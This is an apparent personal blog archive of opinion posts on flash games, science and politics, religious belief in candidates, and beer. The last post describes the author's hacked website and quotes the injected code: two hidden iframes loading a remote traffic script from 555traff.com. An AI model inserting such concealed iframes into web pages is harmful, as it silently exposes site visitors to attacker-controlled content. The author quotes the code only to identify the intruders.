Category Archives: Rant

Cool games

orisinal.com has a bunch of really cool flash games. They aren’t the most graphics intense of games, but they often require a bit of thought and a little bit of skill. But, to me, the most impressive thing is that, at least most of the ones I tried, they are just very elegantly done and something I’d be happy letting a kid play. They aren’t violent; they are, in a word, cute. But still fun and challenging.

Now, I like the standard violent games as much as anyone. The game I’m playing the most right now is Neverwinter Nights, which is pretty violent. And I enjoy the first person shooters when I’m with friends or my brothers. But, I also think that the video game industry is in a bit of a rut creativity-wise (though, definitely not money-wise, which means maybe they aren’t in any rut at all). It just seems that all games are very similar variants of one another. The first person shooter, the D&D role playing game, and so on. There are others out there, but they don’t seem to gain any popularity.

The games at orisinal.com are simple, but they are original. Some of the player moves are things I haven’t seen anywhere else (though, some are, admittedly, very much like classic games such as pong). I was just struck by the simplicity, the elegance, and the innocence, if you will, of the games.

Science? We don’t need no stinking science!

Not a surprise, really, but the previous Surgeon General of the US, Richard H. Carmona, testified before Congress that the Bush administration put politics before science, delibrately watering down or delay scientific reports that went against their policies and actively asking the Surgeon General to play politics.

In relation to my previous rant, this shows the danger of having leaders who have no real knowledge nor care about science and use their personal beliefs and convications to set policy that is in direct conflict with scientific evidence.

Belief and Politics

There has been a lot of talk recently, thanks to the candidacy of Mitt Romney, about the role of personal belief in politics. Jacob Weisberg, writing for Slate, asks if it is religious bigotry to not vote for Romney just because he is Mormon. He argues that this is a valid question because if Romney believes in a religion that is based upon a con-man’s lies, we, as the voters, should know about it and judge him on his gullibility. From a different perspective, Jerry Coyne, in his Edge article, discusses the various candidates’ view of evolution. He discusses Brownback’s claim that we should reject scientific findings if they conflict with our faith, but accept them if they’re compatible (Coyne’s paraphrase of Brownback). Coyne’s point is that if candidates reject science that they are uncomfortable with but that the scientific community strongly supports, we should seriously question if that candidate is worth our vote.

(Incidentally, one minor quibble with Coyne’s otherwise excellent article: He draws the analogy of not believing in evolution to be the same as not believing in atoms and states: …there is just as much evidence for the fact of evolution as there is for the existence of atoms. While I think that the scientific evidence in support of the theory of evolution is strong, atoms are directly observable by several techniques while evolution, to the best of my knowledge, is not directly observed.)

Both articles bring up the role of belief in politics and whether we, as the voting public, should take into account the belief of a candidate before voting for him or her. I would venture to say that both Weisberg and Coyne conclude that not only should we, but we absolutely must take belief into consideration. After all, personal belief plays a major role in people’s lives, informing their decisions and how they act. Just look at the role that religion and belief have played in Bush’s presidency.

Weisberg focuses specifically on Mormonism, feeling that Mormonism was essentially started by a con-man and that anyone who believes what Joseph Smith said is too gullible to deserve his vote. I think this is a little unfair, as the one major disadvantage of Mormonism compared to other religions is its age: it is young enough that a lot more is known about the people who started it than most main stream religions. For all we know, most religions were started by con-men (check out this description by Harlan Ellison on the origins of Scientology).

This, however, raises a bigger point: is anyone who has deep religious conviction then unfit for office? All religions have aspects to them that contradict modern scientific findings. Things that are either untestable or unverifiable. Things that they later have to recant as science uncovers new facts about the universe we live in, facts such as the age of the planet, the age of the universe, the origin of species, the Earth’s place in the universe, the origin of the universe, the nature of free will, the origin of a person’s orientation, and the list goes on. Weisberg points out that, just as he wouldn’t vote for a Mormon, he wouldn’t vote for a fundamentalist that truely believed the Earth was only 7000 years old. But what of a candidate that believed in a literal Garden of Eden? At what point do you draw the line between beliefs that are ok for a public servant to have and ones that are too out there?

Probably most dangerous is, as Coyne points out, those candidates that just plain deny science because it conflicts with their beliefs. This is the same attitude that caused the Church to lock up Galileo when he said the Earth wasn’t the center of the universe. When this attitude prevails, it causes politicians to ignore scientific evidence and use their faith as a guide in times of difficulty. And this can have potentially disasterous results, as our delay in addressing Global Warming may soon show us.

Personal belief has a role in personal life, where the decisions are smaller scale. And faith is probably part of human nature, stemming from a need to place some kind of order on the world around us. But, when faith is the dominant mechanism for making decisions that affect millions and perhaps billions of people, it becomes dangerous. We don’t all agree on what faith is the correct one, which one better informs us about the world around us. Your faith doesn’t necessarily jive with mine. While science isn’t perfect, it has three advantages, in my mind, over faith. First, it is self-correcting. If I publish results that are suspect, other people will check and double-check them to verify if I have done a good job. Theories and hypotheses are updated and replaced as new evidence is found that does or does not support them. Second, science is relatively objective. All science has a bit of the researcher’s bias in it, but that is again the role of peer review, to uncover those biases and make the results as objective as possible. Finally, science is predictive. That is the ultimate test of scientific theories: once we have a theory, can we predict something new that can then be verified. Science can be tested, faith cannot.

A final point about the role of science in society: science, as a way of looking at the world, has spread throughout the world without any coersion on the part of missionaries or conquerors. It has done so on its own merits. It is thus, in some sense, the one view of the world that the world has come to some level of consensus on. People in all parts of the world have adopted, to varying degrees, a scientific outlook. And they have done this on their own initiative.

The symbols are those approved for use on graves at Arlington Cemetery (minus a few that have copyrights).

The End of Beer?

I’m a big beer fan. While I really don’t like any hard liquors and am only luke warm to most wine (unless it is used with coke to make kalimotxo!), I really enjoy a nice, cool pint of beer. And I tend to prefer ales over lagers, the hoppier the better.

Slate has an interesting article by Field Maloney on the rise of wine and the stagnation, if not out-right decline, of beer. Over the last decade, wine consumption has doubled while beer consumption has grown by less than 1 percent since 2000. And, they quote a Gallup poll from 2005 reporting that, for the first time, Americans prefer wine to beer. Incredible!

They state a number of strikes against beer, some of which I would never have guessed. There are the usual suspects, that beer is associated with the working class and wine is a more refined taste. And that wine is more of a connoisseur’s drink, with different vintages and so forth. However, one aspect that surprised me is that wine is viewed as more of a simple craft, a handmade product of the earth, while beer is an industrial process.

I guess wine is simpler to make. Beer requires more steps, more cooking of ingredients, and so forth. I think that a lot of the real problem with beer in America, though, comes from the perception of what beer is. Most people, when they think about beer, still think of the domestic American brands: Coors, Bud, Miller, etc. These are highly massed-produced products with relatively little flavor (in my humble opinion) and, compared to wine, I can see where they get this image of being the result of an industrial process.

However, these days, with the advent of the microbrew, there are so many more choices with beer. I might dare to say that beer choices and varieties rival those of wine. And the quality of these beers are excellent. In Seattle, where I went to school, there were brew pubs all over the place, all with excellent offerings and unique twists on the standard types: India pale ale, porter, stout, extra special bitters, brown ales, blonde ales, lagers, pilsners… the list goes on. Just as happened with the local coffee shop and espresso, beer has undergone a renaissance that most of the country, I believe, is more or less ignorant of.

This new beer, of course, has it’s own image, one that the adherents of the American domestic brew belittle as snobbish or elitist. My brothers both used to heckle my beer choices, labeling me a “beer snob” because I preferred a Red Hook to a Silver Bullet. So, it seems, beer is stuck between a rock and a hard place. To some, it will always be the drink of the working masses, not the social elite to which they aspire. To others, the microbrews are everything wine is: a symbol of those same social elites that they view with some level of contempt.

Well, to hell with it. I don’t care what anyone else says. To me, as Benjamin Franklin said, “Beer is proof that God loves us and wants us to be happy.

National Security… ok not quite

Today, I awoke to find that my website was not quite behaving like normal. I was getting a lot of PHP errors and my brother reported getting a virus warning when logging into my forum. It turns out that someone had exploited a security hole in some software that drives the site. Fortunately, all they did was append a bit of code to files (instead of removing files or something more malicious). Unfortunately, it was quite a few files and it took me a while to fix them all. The files affected all had names containing the words index, login, header, footer, default… things like this. The big of code they included was:

I’m putting it here as I couldn’t find anywhere on the web any description of who these guys were or what the site they were linking back to was about (the site just timed out when I tried to go there directly). So if anyone knows anything about these guys, I’d be interested in hearing about it.

<IFRAME name=’StatPage’ src=’http://www.555traff.com/trf/traf.php‘ width=5 height=5 style=’display:none’> </IFRAME> <IFRAME name=’StatPage’ src=’http://www.555traff.com/trf/traf.php’ width=5 height=5 style=’display:none’> </IFRAME>

It turns out that the hole was easily fixed by my hosting company, which is nice. But it still caused more stress and wasted effort than I’m happy with.